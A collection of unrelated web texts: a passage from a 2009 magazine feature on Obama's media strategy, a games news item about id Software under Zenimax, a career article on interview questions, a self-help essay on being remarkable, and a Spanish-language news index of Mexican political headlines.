And it ’s rare that anything does that now . ”
Burton is quick to add that the country is embroiled in so many crises right now that the president has little choice but to develop initiatives addressing each one of them , and then to discuss them .
And that ’s doubtless true .
But the pacing and variety of the president ’s engagements , combined with the sheer volume of his public appearances , suggests that something else is going on .
These are the weapons of a blitzkrieg presidency , the likes of which we have n’t seen before .
Look at a typical 36 hours in the life of the White House this summer :
On July 13 , Obama made a Rose Garden speech announcing his nominee for surgeon general , Regina Benjamin , and along the way gave an update on health care .
Both parts of his address got picked up by outlets big and small ( Washington Post , page A3 : “ On Health - Care Reform , Obama Looks to the LBJ Model ” ) .
Then he met with labor and Jewish leaders , generating two completely different types of news stories for the wires , blogs , and specialty presses .
He released a video for the White House website answering questions submitted by Africans via Twitter and text .
He addressed an urban - affairs summit , calling for the reinvention of our cities .
The following morning , Obama let cameras and reporters into the Oval Office after his meeting with the Dutch prime minister , answering one question about Afghanistan and one about unemployment .
That afternoon , he flew to Michigan to give an address about the economy and job retraining .
That evening , he gave a fourteen - minute interview to Bob Costas for the MLB network before throwing the ceremonial opening pitch of the All - Star Game in St. Louis .
( “ You gotta make sure they get the new MLB network in the White House , ” said Costas .
“ If I have to , I can have the CIA tap into something , ” reassured Obama . )
At the bottom of the second inning , he chatted with Tim McCarver and Joe Buck on Fox .
And during the game , he starred in a seven - minute video featuring all five living presidents to honor 30 Americans for their community service .
Those same two evenings , Anderson Cooper happened to run a prerecorded interview with Obama , during which the president answered questions about the stimulus and gays in the military .
To sum up : a new surgeon general , health care , government reform in Africa , the Employee Free Choice Act , Israel , urban renewal , Afghanistan , the stimulus , job retraining , community service , gays in the military , baseball .
All in less than 36 hours .
One disadvantage to the blitzkrieg approach is that positive news stories do n’t have much of a shelf life .
But neither do negative ones .
As long as the president keeps generating new material , the bad news shuffles to the bottom .
Danah Boyd , a social - media expert at Microsoft Research , notes that in this way , the president ’s like any blogger or Internet content provider .
She ’s constantly asked the question :
How do I maintain my reputation when this stupid thing I did / wrote / said keeps resurfacing online ?
“ And the advice I give , ” she says , “ is to keep producing . ”
Photo : William Geddes / Beateworks / Corbis ( staircase ) ; Official White House photographs by Pete Souza
Despite his agility in skipping from topic to topic , the president is clearly most comfortable when he can drill deep into one .
During the presidential campaign , when Reverend Wright ’s antics threatened to steer Obama clear off the rails , his advisers had varying ideas about how to handle the situation .
Ultimately , though , it was Obama who decided on the solution :
He ’d give a 37 - minute speech about race .
In the days when just a handful of media outlets drove the news , such a move would have been politically contraindicated , if not outright suicidal .
The speech contained no pithy or rhyming sound bites ( “ Mend it , do n’t end it , ” “ Read my lips ” ) .
It practically defied quoting .
It demanded , rather , to be heard or read in its entirety .
Yet within 48 hours , more than 1.6 million viewers tuned in , making it the single - most - watched video on YouTube for that period .
There ’s a reason for this .
Sound bites , says Clay Shirky , the NYU new - media philosopher and recent author of Here Comes Everybody , were a product of media scarcity , when public figures had a finite amount of time and space to make their points .
Now we live in a world of “ Publish , then filter , ” he points out , rather than “ Filter , then publish , ” a time when the question is “ Why not film this ? ” rather than “ Why film this ? ”
This makes Obama our first post - sound - bite president .
If he wants to give a 37 - minute speech about race , he can give a 37 - minute speech about race , knowing that millions of Americans ( now more than 6 million ) will eventually hear it , even if they fail to catch it in real time .
Not only is ubiquity strategy in a world of unlimited content , volume is too .
Reviving the long - form address may seem strange in an era when the 140 - character tweet and two - sentence blog post form a major part of our communications repertoire .
But Nate Silver , the founder of fivethirtyeight.com , points out that the long form may , in fact , be a natural part of it .
“ If you speak and leave out details , ” he notes , “ bloggers will fill them in . ”
And for those who despair at the telegraphic nature of Twitter and blog posts , Obama ’s long speeches — like long books and long movies — are a canny form of counterprogramming .
During his presidency , Obama has repeatedly chosen a long speech over staccato remarks or scattered statements by surrogates .
When the Senate refused to include funding in an appropriations bill to shut down Guantánamo Bay , he spoke for over 50 minutes at the National Archives about civil liberties .
When he made overtures to the Arab world in Cairo , he spoke for 55 minutes .
When congressional Republicans first began to mount their resistance to his health - care bill , he flew to Green Bay , Wisconsin , and conducted a 62 - minute town hall .
Laurence Tribe , Obama ’s onetime mentor at Harvard Law School , says that the president ’s speeches remind him of “ carefully worded judicial opinions — he avoids overreaching , he carefully states opposing arguments and considerations .
He gently leads the viewers or readers or listeners to their own conclusions rather than ramming one down their throats . ”
Lincoln used to do this in his debates with Douglas , which raises a tantalizing possibility about the future : Perhaps the post - sound - bite age will seem more like the pre-sound - bite age , when most politicians could hold their own in a debate .
Obama ’s civil - liberties speech at the National Archives is a good example of what Tribe was talking about .
Obama opened by summing up the two opposing positions : “ I know some have argued that brutal methods like waterboarding were necessary to keep us safe , ” he said .
“ I categorically reject the assertion that these are the most effective means of interrogation … ” As he went on to make his case , he recruited the words and deeds of his adversaries , rather than inflaming partisan tensions , noting that McCain had campaigned against torture and that Bush had released the bulk of the Guantánamo detainees .
He co-opted a favorite argument of his adversaries , too , remarking that Guantánamo had become an exemplar of inefficient government .
“ We ’re cleaning up something that is — quite simply — a mess , ” he said .
As he was winding down , he anticipated the political repercussions of closing Guantánamo , hoping to defang critics before they could bare their teeth : “ You can almost picture the direct - mail pieces … designed to frighten the population .
I get it . ”
George Lakoff , the Berkeley linguist and author of the The Political Mind , has pointed out that Barack Obama is one of the few Democratic politicians who naturally uses “ deep framing , ” or an implicit moral architecture and worldview to change how the nation sees larger issues .
( Bill Clinton , by contrast , triangulated so frequently that he left his party without a coherent vision .
“ Instead , ” says Lakoff , “ he found lots of small things they could n’t disagree with . ” )
One can certainly give a short speech with a deep frame .
But the longer Obama ’s speeches run , the more opportunity he has to establish and reestablish an underlying worldview — almost without our noticing .
For Democrats , who ’ve ceded the language of values to Republicans for the better part of a quarter - century , repeated modeling of such a tactic is quite useful .
“ Time and again , our values have been our best national - security asset , ” Obama said in the first five minutes of his appearance at the National Archives .
“ It is the reason why enemy soldiers have surrendered to us in battle , knowing they ’d receive better treatment from America ’s armed forces than from their own government . ”
By the time he ’d finished speaking , he ’d used the word moral twice , principle ten times , and value fifteen .
“ We must leave these [ torture ] methods where they belong — in the past , ” he said .
“ They are not who we are .
And they are not America . ”
A temperate July afternoon , with a slightly more intemperate press corps .
Chip Reid , the White House correspondent for CBS News , is quizzing Obama ’s press secretary , Robert Gibbs , about a health - care event the administration has arranged in Virginia .
Why , he wants to know , is the administration calling this event a “ town hall ” when it has hand - picked all of the participants and questions ?
At first the exchange looks as if it ’ll last only a few seconds .
Then Helen Thomas , the woman with the single - longest institutional memory in the press corps , joins in .
THOMAS : It ’s a pattern .
GIBBS : What ’s a pattern ?
THOMAS : It ’s a pattern of controlling the press .
Though the president may be liberal with his media appearances , his relationship with the traditional White House press corps is complicated .
The Obama administration runs a very disciplined press operation .
Its aides almost never leak , unless it ’s deliberate .
It ’s highly selective about access ( during the transition , the New York Times White House team did n’t get the usual sit - down interview ) .
It makes generous use of polls ( every Wednesday night , a group meets for dinner at the home of David Axelrod , Obama ’s top adviser , to discuss politics and message ) .
Not once has Obama shown himself to be psychologically beholden to the White House press corps .
If anything , it ’s the other way around , a favorite Obama punch line : “ A few nights ago , I was up tossing and turning trying to figure out exactly what to say , ” he recently said at a dinner for television and radio correspondents .
“ Finally , when I could n’t get back to sleep , I rolled over and asked Brian Williams what he thought . ”
In Reagan ’s day , it would have been heresy to move so rapidly .
“ We did n’t even understand what he was doing at first .
Why is he stepping on his message ? ”
Obama , in fact , lives in a moment when he can finally do what his modern predecessors only dreamed of : go directly over the heads of the mainstream press .
The White House Flickr stream is a good example .
Since the beginning of his presidency , the Obama press office has uploaded 983 pictures onto the site .
Each is as perfectly composed as an old cover of Life magazine , and each competes with , if not trumps , a photograph taken during a routine photo op , which probably explains why the administration denied outside photographers access to the Oval Office on the president ’s first day in office and released its own pictures instead .
Why leave such an important image to chance if it ’s something you can control ?
( Brad and Angelina , incidentally , did the same thing when their first child was born , knowing that their own polished photos of Shiloh would preempt a paparazzi shot . )
The White House ’s “ prepackaged ” events , as Helen Thomas calls them , are another case in point .
Every modern administration has attempted its own version of those health - care town halls .
But if the mainstream press refused to cover them , the events were of little value .
Not so in the age of YouTube .
Thomas and Reid were right about the health - care event .
It was designed to control the press .
Had it been the only event Obama participated in , it would have been appalling .
But Obama knows full well that a dinky town hall on YouTube does n’t get nearly as many viewers as a town hall on prime - time .
So he does both .
Just the week before that Virginia event , Obama did a health - care town hall on ABC .
The day before the ABC event , he gave a six - minute response to a health - care question … from the White House press corps , at a routine press conference .
Obama , in fact , has by this point given more interviews than any modern president .
The president has also made a point of courting certain influential members of the old media :
He talked to David Leonhardt of the New York Times for a long magazine piece about the economy ; he dined with conservative columnists ( George Will , David Brooks , Bill Kristol ) and had a morning meeting with those closer to his own political kind ( Maureen Dowd , E. J. Dionne Jr. , Rachel Maddow ) .
And his chief of staff , Rahm Emanuel , has spent a lot of time keeping the traditional press corps happy .
If you scan the morning papers , you ’ll find he ’s managed to give most prominent White House reporters some on - the - record quote about whatever they were writing , suggesting he ’s said even more off the record .
He gossips with them , sees them occasionally for off - the - record dinners .
( He ’s the type old - school reporters fetishize : loquacious , intense , so profane he ’d embarrass a toilet . )
Howard Kurtz , the Washington Post media critic , remarked in a recent story that “ perhaps no White House chief of staff in modern history has worked the media as aggressively and relentlessly as Emanuel . ”
For people in a dying industry , so much attention from a president ’s chief of staff is very flattering .
“ The truth is , it does n’t take much , ” says Lou Cannon , the former Washington Post reporter and one of Reagan ’s ablest biographers .
“ If the president ’s a gentleman and his chief of staff returns your calls … ” he trails off .
Reagan was such a man , and Jim Baker returned those calls , same as Obama and Emanuel now .
“ It goes a long way , ” he finally says .
“ We ’re like schoolgirls . ”
Almost all presidents wake up one morning to discover that their greatest strength has become their greatest liability .
Think of Reagan ’s sunniness , which eventually became a signifier of his vacuity , or Clinton ’s charisma , which at his weakest moment led to an act of seduction that led to his impeachment .
In the case of Barack Obama , it ’s his passion for oratory that leaves him most vulnerable to future criticism .
If he manages to genuinely revive the economy or pass a decent health - care bill , great — the public will be thrilled to hear from him for a long time to come .
But if he does n’t , one could imagine people eventually souring on his many public appearances : Dear God , not another speech .
Obama , painfully aware of this hazard , is trying hard to make sure he matches rhetoric with action .
Knowing that none of his agenda , health care especially , will pass without significant involvement from the players on the Hill , he ’s filled the White House with former congressional staffers and ceded much of the bill - writing power to Congress itself .
He ’s also made Emanuel , a man metabolically incapable of sitting still ( one of his favorite expressions is “ putting points on the board ” ) , one of the most powerful White House chiefs of staff in modern history .
It may well be enough .
But the odds are still long .
Which means it ’s worth asking :
What will we be left with if the president can’t meet his ambitious policy goals ?
We ’ll be left with Obama ’s messages themselves .
They ’re no substitute for universal health care , obviously , or a robust economy .
But perhaps the most distinctive aspect of Obama ’s presidency is that he ’s trying to change our minds as much as our policies .
He ’s trying to change our conception of both ourselves and our country , as well as the way outsiders perceive us .
He ’s trying nothing less than to realign American values .
As a former law professor , Obama sees the presidency as a classroom .
( Which is why he did n’t apologize for weighing in on the arrest of Professor Gates a couple of weeks ago , explaining it could be “ a teachable moment . ” )
Since his community - organizing days , he ’s recognized the value of an informed citizenry .
In a way , those meetings he held on Chicago ’s South Side all those years ago were just proto-versions of his seminar - style town halls today .
“ With Clinton , we ’d have town meetings too , but it was different , ” says Stan Greenberg , Clinton ’s former pollster .
“ We were rallying support , and he ’d get energy from those .
Whereas Obama ’s involved in an educative process with voters , trying to explain the problem and show what he ’s doing . ”
To Obama , educating Americans does n’t simply mean demystifying the legislative process or walking them through the rationale for his policies .
It means offering them a kind of moral instruction , one that reshapes their ideas about what ’s required of them — industry , responsibility , empathy , humility — and what ’s required of the government ( the same ) .
These themes were apparent from the moment he began his inaugural address , when he called our weak economy “ a consequence of greed and irresponsibility on the part of some , but also our collective failure to make hard choices and prepare our nation for a new age . ”
He went on to quote Corinthians — that it was time for our nation to “ set aside childish things ” — and exhorted us all to earn our greatness , rather than opt for shortcuts .
After years of excess , in other words , Obama — lean and disciplined , a father of two young children — was here to tell us that the egoism and exceptionalism of the boom and boomer years were over .
Government was no longer an enabling sidekick to our years - long bender .
It was a parent , one whose primary objective was to instill responsibility and empathy in its citizens , and to provide the same in return .
As Lakoff notes , Obama specifically likened government to a parent in his 2008 Father ’s Day address in Chicago , when he told the assembled audience first to set an example of excellence for their children —
“ Do n’t just sit in the house and watch SportsCenter all weekend long ” — and second to remind them to look at the world through others ’ eyes .
“ That ’s our responsibility as fathers , ” he said .
“ And by the way , it ’s a responsibility that also extends to Washington . ”
At the time , most of the press examined this speech through the prism of racial politics , believing they were watching a black presidential candidate gingerly walk the minefield of speaking honestly to a black audience while simultaneously trying to win over a majority - white electorate .
Few considered that Obama may have been outlining his vision of government as a whole .
The values of responsibility and empathy frame his speeches to this day .
Last summer , in the Israeli town of Sderot , he empathized with the citizens who ’d been shelled : “ If somebody was sending rockets into my house where my two daughters sleep at night , I ’m going to do everything in my power to stop that .
And I would expect Israelis to do the same thing . ”
This summer , in Cairo , he empathized with the Palestinians : “ For more than 60 years , they ’ve endured the pain of dislocation , ” he said .
“ And America will not turn our backs on the legitimate Palestinian aspiration for dignity , opportunity , and a state of their own . ”
Two weeks ago , during his health - care conference , he spoke of our larger obligations to those without health care , implying it would be immoral to deny them .
“ This is n’t about me , ” Obama said .
“ This is about every family , every business , and every taxpayer who continues to shoulder the burden …
They ’re counting on us to get this done … and we ca n’t let them down . ”
Let them down , he seemed to be saying , and it ’s on you .
It ’s an old - fashioned thing to do , moral instruction .
Obama ’s propensity for it may have something to do with why people perceive him as humorless or prim .
It ’s not even clear the public ’s amenable to it .
People may just want their jobs back and the Dow to return to 14,000 .
Crises have a way of inspiring magical thinking , especially when there ’s no food in the larder or money in the bank .
But there are other signs that Obama ’s words might be having an impact .
According to a Gallup poll from last week , a plurality of Americans believe that health - care reform will cost them more money and result in worse care for themselves .
At first blush , these results do n’t look good , because they suggest that one of Obama ’s messages — that reforming health care will rein in costs and improve services for everyone — has gotten lost .
That ’s how most pundits played it .
But that poll contained another interesting result :
The plurality of respondents also said they believed that health - care reform would result in a higher quality of care for the nation overall .
That does n’t mean they liked Obama ’s plan .
It does n’t mean they ’ll be inclined to support it .
But would the electorate have even believed such a thing sixteen years ago , when the Clintons first tried to reform the system ?
I ’m guessing not .
I ’m guessing they ’d have said that universal health care meant a disaster for everyone .
At the very least , Obama has somehow impressed upon people that universal access at least nets to the common good .
“ Obama has to go out there on a regular basis so that people will eventually have a different idea of what government and the country is about , ” says Lakoff .
“ That ca n’t happen overnight .
It ’s slow , day after day . ”
It ’s a steady beat of press conferences and town halls and YouTube addresses — a communications lollapalooza , rain or shine .
It ’s messaging not just as a means to an end , but as a kind of end itself .
Three weeks ago , Obama wrote his second op - ed about the economy for the Washington Post .
It drew a few raised eyebrows from the blogosphere , as if repeating this gesture so early in his presidency were trivializing his position .
But the only surprise — not even a surprise , really , so much as inadvertent note of comedy — was the understated bio that ran below :
The writer is president of the United States .
With the purchase of id Software by Zenimax Media , there 's been a lot of relief that someone else did n't pick them up , as well as a great deal of speculation that the developer would be working on either one of Bethesda 's principal franchises or something entirely new .
While this would certainly be an awesome thing to see , Pete Hines of Bethesda has revealed that the studio is already busy enough with its own products ;
Bethesda wo n't be foisting any new projects on id anytime soon .
Speaking to GamesIndustry.biz , Hines revealed that " id has plenty of their own IP to keep themselves busy .
It was their desire to build to three teams and bring the development of their IP in - house .
So we 'll help them build up to the three full teams a little faster , now that they have additional resources , and they 'll work on Rage and Doom 4 and whatever else it is they 'd like to do .
But with Quake , Doom , Wolfenstein , and Rage , they already have more IP than they have teams to work on them .
So right now creating new IP or having them work on our Bethesda IP is n't even being considered . "
Hines also said that id's expertise with first - person shooters was invaluable , as it gave the company an in - house group of experts with the genre .
That said , Hines confirmed that the there 's plenty of room for both studios to keep on doing what each does best :
" We do have a strong portfolio with games like Oblivion and Fallout , and the folks at Bethesda Game Studios will continue to work on those , but these games are n't the same kinds of games that id makes .
So there 's room for them all . "
While some may be disheartened to hear that id wo n't be working on Bethesda franchises like the ones Hines mentioned , it 's also encouraging to hear that id will continue to do what it does best .
The CEO of Truity aspires to connect personality science with real - world problems to help people make the most of their strengths .
Read full profile
Recruiters might hold thousands of interviews in their careers and a lot of them are reporting the same thing — that most candidates play it safe with the questions they ask , or have no questions to ask in a job interview at all .
For job applicants , this approach is crazy !
This is a job that you ’re going to dedicate a lot of hours to and that might have a huge impact on your future career .
Do n’t throw away the chance to figure out if the position is perfect for you .
Here are 7 killer questions to ask in a job interview that will both impress your counterpart and give you some really useful insights into whether this job will be a dream … or a nightmare .
1 . What are some challenges I might come up against this role ?
A lesser candidate might ask , “ what does a typical day look like in this role ? ”
While this is a perfectly reasonable question to ask in an interview , focusing on potential challenges takes you much further because it indicates that you already are visualizing yourself in the role .
It ’s impressive because it shows that you are not afraid of challenges , and you are prepared to strategize a game plan upfront to make sure you succeed if you get the job .
It can also open up a conversation about how you ’ve solved problems in the past which can be a reassuring exercise for both you and the hiring manager .
How it helps you :
If you ask the interviewer to describe a typical day , you may get a vibrant picture of all the lovely things you ’ll get to do in this job and all the lovely people you ’ll get to do them with .
Asking about potential roadblocks means you hear the other side of the story — dysfunctional teams , internal politics , difficult clients , bootstrap budgets and so on .
This can help you decide if you ’re up for the challenge or whether , for the sake of your sanity , you should respectfully decline the job offer .
2 . What are the qualities of really successful people in this role ?
Employers do n’t want to hire someone who goes through the motions ; they want to hire someone who will excel .
Asking this question shows that you care about success , too .
How could they not hire you with a dragon - slayer attitude like that ?
Advertising
How it helps you :
Interviewers hire people who are great people to work with , but the definition of “ great people ” differs from person to person .
Does this company hire and promote people with a specific attitude , approach , worth ethic or communication style ?
Are the most successful people in this role strong extroverts who love to talk and socialize when you are studious and reserved ?
Does the company reward those who work insane hours when you ’re happiest in a more relaxed environment ?
If so , then this may not be the right match for you .
Whatever the answer is , you can decide whether you have what it takes for the manager to be happy with your performance in this role .
And if the interviewer has no idea what success looks like for this position , this is a sign to proceed with extreme caution .
3 . From the research I did on your company , I noticed the culture really supports XYZ .
Can you tell me more about that element of the culture and how it impacts this job role ?
Of course , you could just ask “ what is the culture like here ? ” but then you would miss a great opportunity to show that you ’ve done your research !
Interviewers give BIG bonus point to those who read up and pay attention , and you ’ve just pointed out that ( a ) you ’re diligent in your research ( b ) you care about the company culture and ( c ) you ’re committed to finding a great cultural fit .
How it helps you :
This question is so useful because it lets you pick an element of the culture that you really care about and that will have the most impact on whether you are happy with the organization .
For example , if training and development is important to you , then you need to know what ’s on offer so you do n’t end up in a dead - end job with no learning opportunities .
Companies often talk a good talk , and their press releases may be full of shiny CSR initiatives and all the headline - grabbing diversity programs they ’re putting in place .
This is your opportunity to look under the hood and see if the company lives its values on the ground .
Advertising
A company that says it is committed to doing the right thing by customers should not judge success by the number of up - sells an employee makes , for instance .
Look for consistency , so you are n’t in for a culture shock after you start .
4 . What is the promotion path for this role , and how would my performance on that path be measured ?
To be clear , you are not asking when you will get promoted .
Do n’t go there — it ’s presumptuous , and it indicates that you think you are better than the role you have applied for .
A career - minded candidate , on the other hand , usually has a plan that she ’s working towards .
This question shows you have a great drive toward growth and advancement and an intention to stick with the company beyond your current state .
How it helps you :
One word : hierarchy .
All organizations have levels of work and authority — executives , upper managers , line managers , the workforce , and so on .
Understanding the hierarchical structure gives you power , because you can decide if you can work within it and are capable of climbing through its ranks , or whether it will be endlessly frustrating to you .
In a traditional pyramid hierarchy , for example , the people at the bottom tend to have very little autonomy to make decisions .
This gets better as you rise up through the pyramid , but even middle managers have little power to create policy ; they are more concerned with enforcing the rules the top leaders make .
If having a high degree of autonomy and accountability is important to you , you may do better in a flat hierarchy where work teams can design their own way of achieving the corporate goals .
5 . What ’s the most important thing the successful candidate could accomplish in their first 3 months / 6 months / year ?
Of all the questions to ask in a job interview , this one is impressive because it shows that you identify with and want to be a successful performer , and not just an average one .
Here , you ’re drilling down into what the company needs , and needs quite urgently , proving that you ’re all about adding value to the organization and not just about what ’s in it for you .
How it helps you :
Advertising
Most job descriptions come with 8 , 10 or 12 different job responsibilities and a lot of them with be boilerplate or responsibilities that someone in HR thinks are associated with this role .
This question gives you a better sense of which responsibilities are the most important — and they may not be what initially attracted you to the role .
If you like the idea of training juniors , for example , but success is judged purely on your sales figures , then is this really the job you thought you were applying for ?
This question will also give you an idea of what kind of learning curve you ’re expected to have and whether you ’ll get any ramp - up time before getting down to business .
If you ’re the type of person who likes to jump right in and get things done , for instance , you may not be thrilled to hear that you ’re going to spend the first three months shadowing a peer .
6 . What do you like about working here ?
This simple question is all about building rapport with the interviewer .
People like to talk about themselves , and the interviewer will be flattered that you ’re interested in her opinions .
Hopefully , you ’ll find some great connection points that the two of you share .
What similar things drive you head into the office each day ?
How will you fit into the culture ?
How it helps you :
You can learn a lot from this question .
Someone who genuinely enjoys his job will be able to list several things they like , and their answers will sound passionate and sincere .
If not …. well , you might consider that a red flag .
Since you potentially can learn a lot about the company culture from this question , it ’s a good idea to figure out upfront what ’s important to you .
Maybe you ’re looking for a hands - off boss who values independent thought and creativity ?
Maybe you work better in environments that move at a rapid , exciting pace ?
Whatever ’s important to you , listen carefully and see if you can find any common ground .
7 . Based on this interview , do you have any questions or concerns about my qualifications for the role ?
What a great closing question to ask in a job interview !
It shows that you ’re not afraid of feedback — in fact , you are inviting it .
Not being able to take criticism is a red flag for employers , who need to know that you ’ll act on any “ coaching moments ” with a good heart .
As a bonus , asking this question shows that you are really interested in the position and wish to clear up anything that may be holding the company back from hiring you .
Advertising
How it helps you :
What a devious beast this question is !
On the surface , it looks straightforward , but it ’s actually giving you four key pieces of information .
First , is the manager capable of giving you feedback when put on the spot like this ?
Some managers are scared of giving feedback , or do n’t think it ’s important enough to bother outside of a formal performance appraisal .
Do you want to work for a boss like that ?
How will you improve if no one is telling you what you did wrong ?
Second , can the manager give feedback in a constructive way without being too pillowy or too confrontational ?
It ’s unfair to expect the interviewer to have figured out your preferred way of receiving feedback in the space of an interview , but if she come back with a machine - gun fire of shortcomings or one of those corporate feedback “ sandwiches ” ( the doozy slipped between two slices of compliment ) , then you need to ask yourself , can you work with someone who gives feedback like that ?
Third , you get to learn the things the hiring manager is concerned about before you leave the interview .
This gives you the chance to make a final , tailored sales pitch so you can convince the interviewer that she should not be worried about those things .
Fourth , you get to learn the things the hiring manager is concerned about period .
If turnover is keeping him up at night , then your frequent job hopping might get a lot of additional scrutiny .
If he ’s facing some issues with conflict or communication , then he might raise concerns regarding your performance in this area .
Listen carefully : the concerns that are being raised about you might actually be a proxy for problems in the wider organization .
Making Your Interview Work for You
Interviews are a two - way street .
While it is important to differentiate yourself from every other candidate , understand that convincing the interviewer you ’re the right person for the role goes hand - in - hand with figuring out if the job is the right fit for you .
Would you feel happy in a work environment where the people , priorities , culture and management style were completely at odds with the way you work ?
Did n’t think so !
More Resources About Job Interviews
Featured photo credit : Amy Hirschi via unsplash.com
Life Non-Conformity
The Decision to Be Remarkable
re•mark•able [ adjective ] : worthy of being noticed , especially as being uncommon or extraordinary
***
If you want to break out of the mold of average , the first thing you need to do is to make a decision to be radically different .
Most remarkable people are people of action , and for a good reason : if you do n’t take decisive action , nothing will ever change .
But this first step is entirely mental .
It calls for a clear decision to rise above the culture of mediocrity .
And then , of course , it calls for action .
How do you decide to be remarkable ?
1. Stop making excuses .
Just stop .
No one wants to hear why you could n’t do something , so make a conscious decision to stop talking about it .
2 . Take responsibility .
This is the opposite of giving excuses .
Take responsibility for your own success , and take responsibility for the success of projects you work on .
When something goes wrong ( it usually does ) , take responsibility for that too .
3. Start questioning rules and expectations .
Always ask questions and pay close attention to the answers you hear back .
Some good starting questions are :
Why is this rule in place ?
Who benefits from this rule being followed ?
What are the consequences if I do n’t follow this rule or meet this expectation ?
What is the worst thing that could happen if I do n’t follow this rule ?
4 . Find work that you love and do it well .
Depending on who you are , this requires up to two big changes in your life : first , you have to find work that you love , and second , you have to do it well .
Do it better than expected and people will be amazed .
5 . Begin living your own life .
This is what it ’s all about — the life you were meant to live .
If you do n’t know what that is yet , start looking for it .
Why would you want to live someone else ’s life ?
6 . Take it up a level .
Take what ’s already working well and exponentially add to it .
Grow your business 300 % .
Apply for the position of CFO when you ’re the Accounts Payable Clerk .
Visit five countries instead of one on your next trip ( or if you want to explore one place well , stay three weeks instead of one ) .
Beware of Excellence
But watch out : being remarkable is addicting .
It ’s like regular exercise or healthy eating .
When you first start a new exercise routine or diet , the adjustment is hard for a while .
But after about 3 - 6 months of following it consistently , you build up a natural addiction to it .
Once you get used to regular exercise , you ’ll feel bad when you ’re not doing it .
The same is true with being remarkable : do it once , and it ’s scary .
Do it a few times , and you love it .
Stop doing it , and you ’ll get depressed .
Many remarkable people deal with depression and anxiety all the time because they see the world differently than average people do .
Their own failures and perceived failures are magnified .
When others say , “ Do n’t worry about it , ” they ca n’t understand why someone would think something like that .
For this reason , a lot of geniuses throughout history have been chronically depressed .
Those are the hard things — and you also have to think about the critics , the skeptics , and the competition .
We ’ll come to those later .
On the other hand , there are some great benefits to being remarkable :
HELP FROM A COMMUNITY
As you proceed with your plans for world domination , or whatever you want to do , you ’ll be naturally drawn to others who have made the same decisions to be different .
Even better , they ’ll be drawn to you .
You ’ll learn from them and vice versa .
Whether you live in the Dilbert Cube , the Ivory Tower , the public sector , or are out there on your own somewhere , there are lots of ways to be remarkable .
The specific application is up to you , and when you choose to make your own way , other people who “ get it ” will seek you out .
Remarkable people are all minorities in a world of average living .
HELP FROM THE UNIVERSE
You ’ll find help in all kinds of unexpected places and from people you never knew before .
No one really knows how this works , practically speaking .
It ’s okay ; just accept the gifts that are given to you .
They are given for a reason .
The Brazilian writer Paulo Coelho put this best :
“ When you want something , all the universe conspires in helping you achieve it . ”
All you need to do is 1 ) start something , and 2 ) stick with it long enough to see results .
WHAT GOES UP STAYS UP
Instead of shrinking over time , your vision will actually get bigger .
The funny thing about big goals is that they often take less time to achieve than you expect , and once you achieve them , you ’ve already mentally moved on to bigger and better goals .
As you proceed with questioning authority , building your army , achieving your goals , and helping others , the vision keeps expanding .
This is why it is not much more difficult to grow a business from $ 1,000 a month in sales to $ 10,000 .
The challenge is in getting that first $ 1,000 together .
This is why artists scrape together a meager living for an average of seven years before being noticed .
Most of them drop out along the way , but for those who stick with it , all of sudden they ’re selling paintings for $ 8 a square inch .
( And by the way , art that sells for $ 10,000 is n’t always better than $ 100 art hanging in the coffee shop . )
This is your personal tipping point — not when everyone else starts adopting a new trend and makes it mainstream , but when everything comes together for your own vision .
But you have to get in the game first , and you can do that by being remarkable .
***
Of all the steps required to change the world in the way you see fit , the decision to be remarkable is the most important .
With this decision in place , other variables can be changed .
Do n’t rush this — it ’s a big commitment .
Once you make the commitment , you need a vision to change the world .
What will it be ?
Whatever you choose , make sure it ’s remarkable enough to suit every gift you have ever been given .
Once you decide to defy the expectations of being average , there will be a lot riding on your ultimate success .
Oh , and one final thing : do n’t expect everyone to understand your decision , because plenty of people wo n’t get it at all .
Do n’t worry about them .
Just be remarkable .
###
Image : Li-Mette
section = politica nombre = impresa.politica
Omisiones de dueños y autoridades causaron la tragedia en Hermosillo Después de 55 días de ocurrido el incendio en la guardería ABC de Hermosillo , familiares de los niños que murieron o sufrieron quemaduras reciben hoy un primer informe del ombudsman José Luis Soberanes Foto Notimex La CNDH presenta hoy a familiares de víctimas informe sobre el incendio en la guardería El IMSS no hizo respetar normas oficiales Incumplieron gobiernos de Sonora y Hermosillo leyes sobre uso del suelo y protección civil Los propietarios no subsanaron irregularidades
Persiste rechazo a candidatura única de Nava en el PAN
Pese a la reunión que hubo el pasado fin de semana entre los principales liderazgos del PAN para reflexionar sobre los resultados electorales del pasado 5 de julio , restañar heridas y allanar el camino de César Nava rumbo a la dirigencia del blanquiazul , la inconformidad en este instituto político persiste .
Continuar
Partidos e IFE exigen conocer el plan para elaborar la cédula de identidad Legisladores de PRI y PRD califican el proyecto de inútil , oneroso y poco confiable
No se modificará la ruta crítica para la depuración del padrón electoral , advierten consejeros
Reducir multa a Tv Azteca es enviar mensaje de que se puede violar la ley El árbitro electoral cede ante las presiones : expertos de la UAM
Acribillan a jefe policiaco de Veracruz y queman su casa
Su esposa muere baleada y cuatro hijos calcinados Reportan corporaciones 36 ejecuciones en cuatro entidades
Recapturan a El Azul , otro de los presuntos secuestradores de la hija de Nelson Vargas Cuando esté en el reclusorio tengo cosas que decirles , manifestó a periodistas
Detienen en Michoacán al operador financiero de La Tuta Conceden arraigo contra 11 presuntos integrantes de La Familia
Enviado de la ONU visita Ciudad Juárez Ciudad Juárez , Chih. , 29 de julio .
Para conocer la problemática de la inseguridad en el país , las acciones que realizan las autoridades de los tres niveles de gobierno en la materia y documentar las opiniones de la sociedad civil , Alberto Brunori , representante de la oficina en México del Alto Comisionado de las Naciones Unidas para los Derechos Humanos , visitó Ciudad Juárez , Chihuahua , como parte de una gira de trabajo por varias entidades .
Aunque apenas comenzó la fase de conocimiento sobre este fenómeno , Brunori manifestó que ha percibido cierta preocupación en cuanto al respeto a los derechos humanos .
Continuar
La Comisión Permanente pide a la PGR y a la SSP un informe sobre sus operativos También demanda a la CNDH investigar los abusos cometidos en la lucha antinarco
Debe comparecer el titular de la Sedena : PRD Desde la tribuna de la Comisión Permanente , el Partido de la Revolución Democrática ( PRD ) planteó la urgencia de citar a comparecer al secretario de la Defensa Nacional , Guillermo Galván ; al director de Derechos Humanos de esa dependencia , Jaime Antonio López Portillo , y al procurador de Justicia Militar , José Luis Chávez García , a fin de que informen al Congreso por qué no se han cumplido las recomendaciones de organismos nacionales e internacionales sobre abusos y excesos de personal de las fuerzas armadas contra civiles .
Continuar
Alertan sobre el incremento del consumo de metanfetaminas entre los jóvenes
El zar antidrogas de EU visitó un centro de rehabilitación de drogadictos
El funcionario estadunidense elogió el trabajo de los CIJ , pues evitan la delincuencia
